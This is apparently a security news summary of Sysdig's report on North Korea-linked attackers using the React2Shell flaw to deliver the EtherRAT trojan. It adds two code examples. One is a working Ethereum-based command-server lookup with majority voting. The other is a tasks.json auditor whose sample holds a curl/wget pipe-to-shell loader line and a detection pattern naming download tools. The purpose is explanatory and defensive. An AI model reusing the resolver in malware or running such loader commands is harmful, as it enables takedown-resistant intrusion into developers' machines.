North Korean Hackers Push EtherRAT via React2Shell
North Korea-linked threat actors are exploiting React2Shell, a critical React Server Components (RSC) flaw tracked as CVE-2025-55182 (CVSS 10.0), to deliver a newly uncovered remote access trojan called EtherRAT, researchers at Sysdig report.
Why it matters
- EtherRAT is a major escalation from prior React2Shell abuse, shifting from opportunistic cryptomining and credential theft to stealthy, persistent access designed for long-term operations.
- The activity overlaps with the long-running "Contagious Interview" campaign that targets blockchain and Web3 developers with fake job offers and coding tests across LinkedIn, Upwork, and Fiverr. Socket calls it one of the most prolific npm ecosystem attacks.
How EtherRAT works
- Initial access: Attackers exploit CVE-2025-55182 to run a Base64-encoded shell command that retrieves a deployment script (via curl, with wget/python3 as fallbacks).
- Environment prep: The script downloads Node.js v20.10.0 from nodejs.org, writes an encrypted payload blob and an obfuscated JavaScript dropper, cleans up traces, then executes the dropper.
- Payload launch: The dropper decrypts EtherRAT with a hard-coded key and runs it using the downloaded Node.js binary.
Ethereum-powered C2 with consensus
- EtherRAT uses EtherHiding to resolve its command-and-control (C2) URL from an Ethereum smart contract every five minutes.
- To resist takedowns and poisoning, it queries nine public Ethereum RPC endpoints in parallel and selects the URL returned by majority vote.
- Similar techniques were seen in npm packages colortoolsv2 and mimelib2, previously used to deliver downloader malware.
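The resolution logic described above, as an added example (not Sysdig's code and not the malware's own): several JSON-RPC endpoints are asked in parallel for the contract's string return value, each reply is ABI-decoded, and a URL is accepted only when more than half of all endpoints queried agree on it, so a poisoned or unreachable minority is outvoted. The contract address, the getter's 4-byte selector and the endpoint names are placeholders, and the replies are constructed for the demo.

```javascript
// Added example: EtherHiding-style C2 lookup with a strict majority vote.
const CONTRACT = "0x000000000000000000000000000000000000dead"; // placeholder address
const GETTER_SELECTOR = "0x00000000"; // placeholder: first 4 bytes of keccak256("getter()")

// Decode the ABI encoding of a single `string` return value:
// word 0 = byte offset of the data, the word at that offset = length, then UTF-8 bytes.
function decodeAbiString(hexData) {
  const buf = Buffer.from(hexData.replace(/^0x/, ""), "hex");
  if (buf.length < 64) throw new Error("ABI payload too short");
  const offset = Number(buf.readBigUInt64BE(24));        // low 8 bytes of word 0
  const length = Number(buf.readBigUInt64BE(offset + 24));
  const start = offset + 32;
  if (start + length > buf.length) throw new Error("ABI length exceeds payload");
  return buf.subarray(start, start + length).toString("utf8");
}

// Inverse of decodeAbiString; only used to fabricate the sample replies below.
function encodeAbiString(str) {
  const data = Buffer.from(str, "utf8");
  const out = Buffer.alloc(64 + Math.ceil(data.length / 32) * 32);
  out.writeBigUInt64BE(32n, 24);
  out.writeBigUInt64BE(BigInt(data.length), 56);
  data.copy(out, 64);
  return "0x" + out.toString("hex");
}

// Tally the URLs from endpoints that answered. Accept one only if more than half
// of ALL endpoints queried returned it, so unreachable and disagreeing (poisoned)
// endpoints both count against it. The strict rule is this example's choice; the
// article does not say how EtherRAT handles ties.
function majorityVote(settled, totalEndpoints) {
  const tally = new Map();
  for (const r of settled) {
    if (r.status === "fulfilled") tally.set(r.value, (tally.get(r.value) || 0) + 1);
  }
  let best = null;
  for (const [url, votes] of tally) {
    if (!best || votes > best.votes) best = { url, votes };
  }
  return best && best.votes * 2 > totalEndpoints ? best : null;
}

// Query every endpoint in parallel. `callFn(rpcUrl, params)` performs eth_call and
// resolves to the raw hex result (an HTTP JSON-RPC client in real use).
async function resolveC2(endpoints, callFn, timeoutMs = 3000) {
  const calls = endpoints.map((rpc) => {
    let timer;
    const timeout = new Promise((_, reject) => {
      timer = setTimeout(() => reject(new Error("timeout")), timeoutMs);
      timer.unref(); // do not keep the process alive just for the timeout
    });
    return Promise.race([callFn(rpc, { to: CONTRACT, data: GETTER_SELECTOR }), timeout])
      .then(decodeAbiString)
      .finally(() => clearTimeout(timer));
  });
  return majorityVote(await Promise.allSettled(calls), endpoints.length);
}

// Constructed replies for nine endpoints: seven honest, one poisoned, one down.
const HONEST = "https://c2.example.invalid/api";
const POISONED = "https://sinkhole.example.invalid/";
const FAKE_RPCS = Object.fromEntries(
  Array.from({ length: 9 }, (_, i) => [
    `https://rpc${i}.example.invalid`,
    i === 7 ? POISONED : i === 8 ? null : HONEST,
  ]));

async function fakeEthCall(rpcUrl) {
  const url = FAKE_RPCS[rpcUrl];
  if (url === null) throw new Error("ECONNREFUSED");
  return encodeAbiString(url);
}

// A real implant would repeat this on a timer (the article says every five minutes).
resolveC2(Object.keys(FAKE_RPCS), fakeEthCall).then((r) => console.log("resolved:", r));
```

With seven of nine endpoints agreeing the honest URL wins; with four honest, four poisoned and one down there is no strict majority and the lookup fails closed. From the defender's side this is why sinkholing one or two public RPC providers achieves nothing: the vote has to be broken at the contract, or the traffic caught after resolution.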
Post-compromise behavior
- Ultra-frequent tasking: Polls the C2 every 500 ms and executes any response over 10 characters as JavaScript on the host.
- Five-layer persistence on Linux:
  - Systemd user service
  - XDG autostart entry
  - Cron jobs
  - .bashrc injection
  - Profile injection
- Self-updating: Sends its source to an API, receives a functionally identical but differently obfuscated update, overwrites itself, and relaunches—helping evade static signature detection.
- Campaign overlaps: Loader patterns align with BeaverTail, a known JavaScript stealer/downloader, reinforcing ties to Contagious Interview.
Contagious Interview evolves: from npm to VS Code
- A new variant urges victims to clone malicious repos (GitHub, GitLab, Bitbucket) and open them in Visual Studio Code.
- A tasks.json file with runOptions.runOn: 'folderOpen' auto-executes on project open, pulling a loader via curl or wget.
- On Linux, a chain of scripts (including vscode-bootstrap.sh, package.json, and env-setup.js) ultimately launches BeaverTail and InvisibleFerret.
- OpenSourceMalware tracked 13 campaign versions across 27 GitHub accounts and 11 BeaverTail builds, from April 22, 2025 to December 1, 2025. Operators have largely shifted hosting to Vercel, abandoning Fly.io, Platform.sh, Render, and others.
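A check for the folder-open trigger described above, as an added example (not the campaign's file and not VS Code's code): it parses a tasks.json, which VS Code accepts with comments and trailing commas, and reports every task that would run on folder open, rating it high when the command line looks like a download-and-execute. The sample tasks.json is constructed to mirror the pattern reported above; the URL is a placeholder.

```javascript
// Added example: find auto-run tasks in a VS Code tasks.json.

// Constructed sample: one auto-run task that pulls a script, one ordinary build task.
const SAMPLE_TASKS_JSON = `{
  // VS Code tolerates comments and trailing commas in tasks.json
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Prepare environment",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/vscode-bootstrap.sh | sh || wget -qO- https://example.invalid/vscode-bootstrap.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
    { "label": "build", "type": "shell", "command": "npm", "args": ["run", "build"] }
  ]
}`;

// Index just past the closing quote of the JSON string literal starting at i.
function skipString(text, i) {
  let j = i + 1;
  while (j < text.length && text[j] !== '"') j += text[j] === "\\" ? 2 : 1;
  return j + 1;
}

// Turn JSON-with-comments into strict JSON: drop // and /* */ comments and
// trailing commas, but never touch the inside of string literals.
function stripJsonc(text) {
  let out = "";
  for (let i = 0; i < text.length; ) {
    const c = text[i], next = text[i + 1];
    if (c === '"') { const j = skipString(text, i); out += text.slice(i, j); i = j; }
    else if (c === "/" && next === "/") { while (i < text.length && text[i] !== "\n") i++; }
    else if (c === "/" && next === "*") { const e = text.indexOf("*/", i + 2); i = e < 0 ? text.length : e + 2; }
    else if (c === ",") {
      let k = i + 1;
      while (k < text.length && /\s/.test(text[k])) k++;
      if (text[k] !== "}" && text[k] !== "]") out += c; // keep only non-trailing commas
      i++;
    }
    else { out += c; i++; }
  }
  return out;
}

// What a loader-fetching task tends to contain (this example's heuristics).
const FETCH_PATTERN = /\b(curl|wget|Invoke-WebRequest|iwr|certutil|bitsadmin)\b|\|\s*(sh|bash|zsh|node|python3?)\b|base64\s+(-d|--decode|-D)\b/i;

function taskCommandLine(task) {
  return [task.command, ...(task.args || [])]
    .map((p) => (p && typeof p === "object" ? p.value : p)) // args may be { value, quoting }
    .filter((p) => typeof p === "string")
    .join(" ");
}

// Report every task VS Code would start on folder open; "high" when the command
// line looks like download-and-execute, "review" otherwise.
function auditTasks(tasksJsonText) {
  const doc = JSON.parse(stripJsonc(tasksJsonText));
  const findings = [];
  for (const task of doc.tasks || []) {
    if (!task.runOptions || task.runOptions.runOn !== "folderOpen") continue;
    const command = taskCommandLine(task);
    findings.push({
      label: task.label || "(unlabelled)",
      severity: FETCH_PATTERN.test(command) ? "high" : "review",
      command,
    });
  }
  return findings;
}

console.log(JSON.stringify(auditTasks(SAMPLE_TASKS_JSON), null, 2));
```

Run it over .vscode/tasks.json of any repository before opening it in the editor; platform-specific overrides (the windows, linux and osx keys) are not inspected here. The trigger itself is a legitimate VS Code feature, so the durable mitigation is configuration: the task.allowAutomaticTasks setting can be set to "off", and VS Code's Workspace Trust does not run tasks for a folder opened in Restricted Mode.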
Bottom line
Sysdig assesses EtherRAT as a sophisticated, rapidly evolving implant that complicates traditional takedown and detection efforts through Ethereum-backed C2, multi-layer persistence, and agile updates. Whether it reflects a new DPRK pivot or technique reuse, defenders face a high-resilience threat targeting developer ecosystems.
Source: The Hacker News